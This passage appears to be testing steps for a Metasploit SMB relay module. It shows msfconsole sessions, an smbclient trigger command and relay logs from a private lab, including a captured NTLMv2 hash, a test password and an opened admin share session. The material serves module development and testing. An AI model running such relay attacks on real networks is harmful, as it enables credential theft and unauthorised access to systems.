msf exploit(windows/smb/smb_relay) > msf exploit(windows/smb/smb_relay) > 
msf exploit(windows/smb/smb_relay) > sessions -i -1 
[*] Starting interaction with 6...

SMB (172.16.199.200) > shares
Shares
======

    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  IPC$      IPC|SPECIAL   Remote IPC
    3  NETLOGON  DISK          Logon server share
    4  SYSVOL    DISK          Logon server share

SMB (172.16.199.200) > 
```

4. Kill the relay server job with `jobs -K`, set only one RHOST and verify auth can be successfully relayed to one target by `smbclient` (or any client that doesn't support resending an authentication to the session expired smb status code )

Trigger the relay like so:
```
(.venv) (devbox) ➜  smbcmp git:(master) ✗ smbclient //172.16.199.1/ADMIN$ -U KERBEROS\\Administrator%N0tpassword!
session setup failed: NT_STATUS_INVALID_PARAMETER
```

And verify it works:
```
msf exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(windows/smb/smb_relay) > [*] 172.16.199.200:445 - SMB Server is running. Listening on 0.0.0.0:445
[*] 172.16.199.200:445 - Server started.
[*] 172.16.199.200:445 - New request from 172.16.199.131
I, [2026-03-16T20:30:53.171534 #85581]  INFO -- : Starting thread for connection from 172.16.199.131
I, [2026-03-16T20:30:53.281599 #85581]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-16T20:30:53.293959 #85581] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
[*] 172.16.199.200:445 - Relaying to next target smb://172.16.199.200:445
I, [2026-03-16T20:30:53.342984 #85581]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: false)
D, [2026-03-16T20:30:53.385423 #85581] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 1574663220, user_id: nil, state: :in_progress>)
I, [2026-03-16T20:30:53.403892 #85581]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as
[+] 172.16.199.200:445 - Identity:  - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : KERBEROS\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::KERBEROS:68344e5d7e5f70d1:6f3168b10ab785b56c7d731629a69c8c:0101000000000000fa747875beb5dc01ad756f882617c1e700000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e006900730073007500650007000800fa747875beb5dc0106000400020000000800300030000000000000000000000000000000d810e83dd97e782193d89a1a94bbb081ffc280d879b135ddaa28ee71a905623a0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100390039002e00310000000000

[*] SMB session 1 opened (172.16.199.1:59507 -> 172.16.199.200:445) at 2026-03-16 20:30:55 -0700
I, [2026-03-16T20:30:55.303934 #85581]  INFO -- : Ending thread for connection from 172.16.199.131

```
